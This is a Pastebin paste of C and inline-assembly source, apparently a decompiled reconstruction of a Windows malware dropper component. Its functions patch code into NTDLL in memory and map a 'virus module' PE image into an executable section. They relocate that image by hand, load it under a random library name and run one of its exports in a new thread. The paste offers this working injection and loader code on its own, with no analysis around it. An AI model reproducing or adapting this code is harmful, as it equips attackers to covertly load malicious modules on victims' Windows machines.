Advertisement
FlyFar

dropper_CodeBlock.c

Feb 19th, 2023
468
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 10.01 KB | Cybersecurity | 0 0
  1. #include "C. CodeBlock.h"
  2. #include "8. AssemblyBlock1.h"
  3. #include "9. AssemblyBlock2.h"
  4.  
  5. #include "config.h"
  6.  
  7. // 98% (C) CODE MATCH
  8. INT32 BLOCK4_InjectAndExecuteVirus(PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader)
  9. {
  10.     HANDLE hThread; // [sp+0h] [bp-98h]@8
  11.     HMODULE pVirusModule; // [sp+4h] [bp-94h]@5
  12.     HANDLE hMappedAddress; // [sp+8h] [bp-90h]@11
  13.     INT32 iResult; // [sp+Ch] [bp-8Ch]@1
  14.     PVIRUS_MODULE_BLOCKS_HEADER pVirusModuleSection; // [sp+10h] [bp-88h]@1
  15.     PHARDCODED_ADDRESSES pHardAddrs; // [sp+14h] [bp-84h]@1
  16.     GENERAL_INFO_BLOCK sInfoBlockCopy; // [sp+18h] [bp-80h]@1
  17.  
  18.     pVirusModuleSection = (PVIRUS_MODULE_BLOCKS_HEADER)sASMCodeBlocksHeader->VirusModuleSection;
  19.     pHardAddrs = (PHARDCODED_ADDRESSES)(sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(&g_hardAddrs, __ASM_BLOCK1_0));
  20.    
  21.     BLOCK4_memcpy(&sInfoBlockCopy, pVirusModuleSection, sizeof(GENERAL_INFO_BLOCK));
  22.    
  23.     sInfoBlockCopy.OriginalAddress = (DWORD)&sInfoBlockCopy ^ X_PTR_KEY;
  24.     sInfoBlockCopy.UnknownZero0 = 0;
  25.     sInfoBlockCopy.AlignAddressesFunction = sASMCodeBlocksHeader->AlignAddresses;
  26.    
  27.     iResult = BLOCK4_LoadVirusModuleInfo(pHardAddrs, &sInfoBlockCopy, (PVOID)pVirusModuleSection->VirusModuleSegment.SegmentAddress, pVirusModuleSection->VirusModuleSegment.SegmentSize);
  28.     if(iResult) return iResult;
  29.    
  30.     iResult = BLOCK4_InjectCodeIntoNTDLL(sASMCodeBlocksHeader, pHardAddrs);
  31.     if(iResult) return -4;
  32.    
  33.     pVirusModule = pHardAddrs->LoadLibraryW(sInfoBlockCopy.RandomLibraryName);
  34.     if(!pVirusModule) return -9;
  35.    
  36.     pVirusModuleSection->VirusModulePointer = pVirusModule;
  37.     if(pVirusModuleSection->LibraryExecuteEntryNumber != -1)
  38.     {
  39.         hThread = pHardAddrs->CreateThread(NULL, 0x00080000, (LPTHREAD_START_ROUTINE)sASMCodeBlocksHeader->ExecuteLibrary, sASMCodeBlocksHeader, 0, NULL);
  40.        
  41.         if(!hThread) return -13;
  42.        
  43.         pHardAddrs->WaitForSingleObject(hThread, -1);
  44.         pHardAddrs->GetExitCodeThread(hThread, (LPDWORD)&iResult);
  45.     }
  46.    
  47.     hMappedAddress = sInfoBlockCopy.MappedAddress;
  48.     if(sInfoBlockCopy.MappedAddress)
  49.     {
  50.         sInfoBlockCopy.MappedAddress = 0;
  51.         pHardAddrs->ZwClose(hMappedAddress);
  52.     }
  53.    
  54.     pHardAddrs->UnmapViewOfFile(pVirusModuleSection);
  55.     return iResult;
  56. }
  57.  
  58. // 99% (C) CODE MATCH
  59. INT32 BLOCK4_ExecuteLibrary(PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader)
  60. {
  61.     FARPROC pLibraryExecEntry; // [sp+0h] [bp-Ch]@1
  62.     PVIRUS_MODULE_BLOCKS_HEADER pVirusModuleSection; // [sp+4h] [bp-8h]@1
  63.     PHARDCODED_ADDRESSES pHardAddrs; // [sp+8h] [bp-4h]@1
  64.  
  65.     pVirusModuleSection = (PVIRUS_MODULE_BLOCKS_HEADER)sASMCodeBlocksHeader->VirusModuleSection;
  66.     pHardAddrs          = (PHARDCODED_ADDRESSES)(sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(&g_hardAddrs, __ASM_BLOCK1_0));
  67.    
  68.     pLibraryExecEntry = pHardAddrs->GetProcAddress(pVirusModuleSection->VirusModulePointer, (LPCSTR)pVirusModuleSection->LibraryExecuteEntryNumber);
  69.    
  70.     if(pLibraryExecEntry)
  71.     {
  72.         // Note: Same arguments passed to the 15th function of the internal library, maybe it was another module loaded in the past?
  73.         ((__tLibraryExecEntry)pLibraryExecEntry)((LPVOID)pVirusModuleSection->UnknownSegment.SegmentAddress, pVirusModuleSection->UnknownSegment.SegmentSize);
  74.         return 0;
  75.     }
  76.    
  77.     pHardAddrs->FreeLibrary(pVirusModuleSection->VirusModulePointer);
  78.     return 0;
  79. }
  80.  
  81. // 99% (C) CODE MATCH
  82. void BLOCK4_CopyPEHeaderInfo(PGENERAL_INFO_BLOCK sInfoBlock, PIMAGE_NT_HEADERS pImageNT, INT32 iVirusModuleSize)
  83. {
  84.     sInfoBlock->AbsoluteEntryPoint = pImageNT->OptionalHeader.ImageBase + pImageNT->OptionalHeader.AddressOfEntryPoint;
  85.     sInfoBlock->UnknownZero1 = 0;
  86.     sInfoBlock->SizeOfStackReserve = pImageNT->OptionalHeader.SizeOfStackReserve;
  87.     sInfoBlock->SizeOfStackCommit = pImageNT->OptionalHeader.SizeOfStackCommit;
  88.     sInfoBlock->Subsystem = pImageNT->OptionalHeader.Subsystem;
  89.     sInfoBlock->MinorSubsystemVersion = pImageNT->OptionalHeader.MinorSubsystemVersion;
  90.     sInfoBlock->MajorSubsystemVersion = pImageNT->OptionalHeader.MajorSubsystemVersion;
  91.     sInfoBlock->UnknownZero2 = 0;
  92.     sInfoBlock->Charactersitics = pImageNT->FileHeader.Characteristics;
  93.     sInfoBlock->DllCharacteristics = pImageNT->OptionalHeader.DllCharacteristics;
  94.     sInfoBlock->Machine = pImageNT->FileHeader.Machine;
  95.     sInfoBlock->UnknownOne = 1;
  96.     sInfoBlock->UnknownFour = 4;
  97.     sInfoBlock->LoaderFlags = pImageNT->OptionalHeader.LoaderFlags;
  98.     sInfoBlock->VirusModuleSize = iVirusModuleSize;
  99.     sInfoBlock->UnknownZero3 = 0;
  100. }
  101.  
  102. // 94% (C) CODE MATCH
  103. NTSTATUS BLOCK4_AlignAddresses(PIMAGE_DOS_HEADER *pImageDOS)
  104. {
  105.     DWORD *dwItemAddress; // ST08_4@20
  106.     WORD *wTypeOffset; // [sp+8h] [bp-24h]@12
  107.     UINT32 iDeltaSizeOfBlock; // [sp+Ch] [bp-20h]@12
  108.     UINT32 j; // [sp+10h] [bp-1Ch]@14
  109.     PIMAGE_NT_HEADERS pImageNT; // [sp+18h] [bp-14h]@6
  110.     DWORD pImageBaseDelta; // [sp+1Ch] [bp-10h]@6
  111.     DWORD pImageBase; // [sp+24h] [bp-8h]@4
  112.     PIMAGE_BASE_RELOCATION i; // [sp+28h] [bp-4h]@10
  113.  
  114.     if(!pImageDOS || !*pImageDOS)
  115.         return STATUS_ACCESS_VIOLATION;
  116.    
  117.     pImageBase = (DWORD)pImageDOS;
  118.     if((*pImageDOS)->e_magic != MZ_HEADER)
  119.         return STATUS_ACCESS_VIOLATION;
  120.    
  121.     pImageNT = (PIMAGE_NT_HEADERS)(pImageBase + (*pImageDOS)->e_lfanew);
  122.     pImageBaseDelta = (DWORD)(pImageBase - pImageNT->OptionalHeader.ImageBase);
  123.    
  124.     if(pImageBase == pImageNT->OptionalHeader.ImageBase)
  125.         return STATUS_SUCCESS;
  126.    
  127.     pImageNT->OptionalHeader.ImageBase = pImageBase;
  128.     if(!pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size)
  129.         return STATUS_CONFLICTING_ADDRESSES;
  130.    
  131.     for(i = (PIMAGE_BASE_RELOCATION)(pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress + pImageBase); i->SizeOfBlock; i += i->SizeOfBlock/sizeof(IMAGE_BASE_RELOCATION))
  132.     {
  133.         iDeltaSizeOfBlock = i->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION);
  134.         wTypeOffset = (WORD *)(i + 1);
  135.        
  136.         if(iDeltaSizeOfBlock % 2)
  137.             return STATUS_CONFLICTING_ADDRESSES;
  138.        
  139.         for(j = 0; j < iDeltaSizeOfBlock / 2; ++j)
  140.         {
  141.             if((UINT8)((*wTypeOffset / 0x100) / 0x10) != IMAGE_REL_BASED_ABSOLUTE)
  142.             {
  143.                 if((UINT8)((*wTypeOffset / 0x100) / 0x10) != IMAGE_REL_BASED_HIGHLOW)
  144.                     return STATUS_CONFLICTING_ADDRESSES;
  145.                
  146.                 dwItemAddress = (DWORD *)((*wTypeOffset & 0x0FFF) + i->VirtualAddress + pImageBase);
  147.                 *dwItemAddress += pImageBaseDelta;
  148.             }
  149.            
  150.             wTypeOffset++;
  151.         }
  152.     }
  153.    
  154.     return 0;
  155. }
  156.  
  157. // 100% (ASM) CODE MATCH
  158. __declspec(naked) void BLOCK4_memcpy(void *pDestination, const void *pSource, unsigned int iSize)
  159. {
  160.     __asm {
  161.         push    ebp
  162.         mov     ebp, esp
  163.         push    esi
  164.         push    edi
  165.         mov     edi, pDestination
  166.         mov     esi, pSource
  167.         mov     ecx, iSize
  168.         rep movsb
  169.         pop     edi
  170.         pop     esi
  171.         pop     ebp
  172.         retn
  173.     }
  174. }
  175.  
  176. // 99% (C) CODE MATCH
  177. void BLOCK4_CopyDataIntoMapView(PVOID pVirusModule, PIMAGE_NT_HEADERS pImageNT, LPVOID pMapViewOfFile)
  178. {
  179.     INT32 dwNumberOfSections; // [sp+0h] [bp-Ch]@1
  180.     PIMAGE_SECTION_HEADER pImageSections; // [sp+4h] [bp-8h]@1
  181.     INT32 dwCurrentSection; // [sp+8h] [bp-4h]@1
  182.  
  183.     dwNumberOfSections = pImageNT->FileHeader.NumberOfSections;
  184.     BLOCK4_memcpy(pMapViewOfFile, pVirusModule, pImageNT->OptionalHeader.SizeOfHeaders);
  185.     pImageSections = (PIMAGE_SECTION_HEADER)((DWORD)pImageNT + pImageNT->FileHeader.SizeOfOptionalHeader + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD));
  186.    
  187.     // Copy section by section
  188.     for(dwCurrentSection = 0; dwCurrentSection < dwNumberOfSections; dwCurrentSection++, pImageSections++)
  189.     {
  190.         if(pImageSections->SizeOfRawData) // If the section VirtualSize is valid copy the entire section
  191.             BLOCK4_memcpy((void *)((DWORD)pMapViewOfFile + pImageSections->VirtualAddress), (const void *)((DWORD)pVirusModule + pImageSections->PointerToRawData), pImageSections->SizeOfRawData);
  192.     }
  193. }
  194.  
  195. // 99% (C) CODE MATCH
  196. INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, PHARDCODED_ADDRESSES pHardAddrs)
  197. {
  198.     HMODULE hHandleNTDLL; // [sp+8h] [bp-Ch]@1
  199.     void *v4; // [sp+Ch] [bp-8h]@3
  200.     DWORD dwOld; // [sp+10h] [bp-4h]@5
  201.  
  202.     hHandleNTDLL = pHardAddrs->NTDLL_DLL;
  203.     if(!pHardAddrs->NTDLL_DLL) return 0;
  204.    
  205.     v4 = (void *)(hHandleNTDLL + 16);
  206.     if(*(_DWORD *)(hHandleNTDLL + 16) == 0xAB49103B) return 0; // Check if the code has been already injected
  207.    
  208.     if(pHardAddrs->VirtualProtect(hHandleNTDLL, 0x1000, PAGE_EXECUTE_WRITECOPY, &dwOld))
  209.     {
  210.         BLOCK4_memcpy(v4, (const void *)sASMCodeBlocksHeader->ASMBlock0Segment.SegmentAddress, sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize); // inject the code
  211.         ((void (__thiscall *)(void *))sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress)(v4); // __thiscall ignored by compiler
  212.         pHardAddrs->FlushInstructionCache((HANDLE)-1, NULL, 0);
  213.        
  214.         return 0;
  215.     }
  216.    
  217.     return -4;
  218. }
  219.  
  220. // 97% (C) CODE MATCH
  221. INT32 BLOCK4_LoadVirusModuleInfo(PHARDCODED_ADDRESSES pHardAddrs, GENERAL_INFO_BLOCK *sInfoBlock, PVOID pVirusModule, INT32 iVirusModuleSize)
  222. {
  223.     PIMAGE_NT_HEADERS pImageNT; // [sp+0h] [bp-1Ch]@3
  224.     LARGE_INTEGER liMaximumSize; // [sp+4h] [bp-18h]@5
  225.     NTSTATUS iStatus; // [sp+Ch] [bp-10h]@5
  226.     LPVOID pMapViewOfFile; // [sp+10h] [bp-Ch]@7
  227.     HANDLE hSectionHandle; // [sp+14h] [bp-8h]@5
  228.     PIMAGE_DOS_HEADER pImageDOS; // [sp+18h] [bp-4h]@1
  229.  
  230.     sInfoBlock->MappedAddress = 0;
  231.     pImageDOS = (PIMAGE_DOS_HEADER)pVirusModule;
  232.    
  233.     if(((PIMAGE_DOS_HEADER)pVirusModule)->e_magic != MZ_HEADER) return -2;
  234.    
  235.     pImageNT = (PIMAGE_NT_HEADERS)((DWORD)pVirusModule + pImageDOS->e_lfanew);
  236.     if(pImageNT->Signature != PE_HEADER) return -2;
  237.    
  238.     liMaximumSize.LowPart  = pImageNT->OptionalHeader.SizeOfImage; // 0x00006000
  239.     liMaximumSize.HighPart = 0;
  240.    
  241.     // ZwCreateSection(..., 0xF001F, 0, ..., 64, 0x8000000, 0)
  242.     iStatus = pHardAddrs->ZwCreateSection(&hSectionHandle, SECTION_ALL_ACCESS, 0, &liMaximumSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, 0);
  243.     if(iStatus != STATUS_SUCCESS) return -11;
  244.    
  245.     pMapViewOfFile = pHardAddrs->MapViewOfFile(hSectionHandle, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
  246.     if(!pMapViewOfFile)
  247.     {
  248.         pHardAddrs->ZwClose(hSectionHandle);
  249.         return -10;
  250.     }
  251.    
  252.     sInfoBlock->MappedAddress = hSectionHandle;
  253.     BLOCK4_CopyDataIntoMapView(pVirusModule, pImageNT, pMapViewOfFile);
  254.     BLOCK4_CopyPEHeaderInfo(sInfoBlock, pImageNT, iVirusModuleSize);
  255.    
  256.     pHardAddrs->UnmapViewOfFile(pMapViewOfFile);
  257.    
  258.     return 0;
  259. }
  260.  
  261. // 100% (ASM) CODE MATCH
  262. void BLOCK4_END(void)
  263. {
  264.     ;
  265. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement